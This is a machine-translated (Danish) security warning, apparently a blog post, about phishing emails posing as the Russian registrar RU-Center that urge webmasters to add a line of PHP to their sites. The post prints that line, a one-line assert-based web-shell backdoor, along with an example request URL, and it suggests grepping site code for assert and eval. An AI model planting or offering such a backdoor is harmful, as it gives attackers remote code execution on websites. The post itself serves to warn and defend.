Opmærksomhed på "webmasters", der ikke kender PHP. Sårbarhed.

Dette er en automatisk oversættelse.
Klik her for at læse publikationen på originalsproget.

I dag modtog nogle af mine venner breve, angiveligt fra RU -Center (den største russiske domænenavnsregistrator) — nic.ru, med følgende indhold:

Brev blev sendt fra [email protected] . I brevet foreslår angriberne, der repræsenterer sig selv på vegne af RU-centret, at placere følgende kode på webstedet:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Desværre kender mange af vores kolleger, der kalder sig "webmasters" (mange webstedsejere), ikke PHP og tænker ikke over farerne ved ovenstående kode. Hvis du sender en streng som parameter til denne funktion, betragtes den med assert () som PHP —kode! Vær forsigtig!

Jeg anbefaler, at du inspicerer dine php —projekter for sårbarheder ved hjælp af kommandoen assert eller eval. Hvis disse kommandoer er til stede i projektkoden, skal du ikke gå i panik — studer deres algoritme. Autoriseret brug af algoritmer er ganske muligt. I tilfælde af ovenstående eksempel tillader kommandoen angribere at ringe til dit websted, f.eks. Ved hjælp af RUCENTER-parameteren- http://sistema-audit.ru/?RUCENTER=PHP-code

Vi anbefaler, at du udfører en søgning ved hjælp af f.eks. Linux —kommandoen grep —i —r 'assert' / home / www / mysite / * med angivelse af mappen med webstedets filer for at få en liste over filer, hvor den mistænkelige forekomst bruges kode.

Pas på dig selv og dine websteder!

Dette er en automatisk oversættelse.
Klik her for at læse publikationen på originalsproget.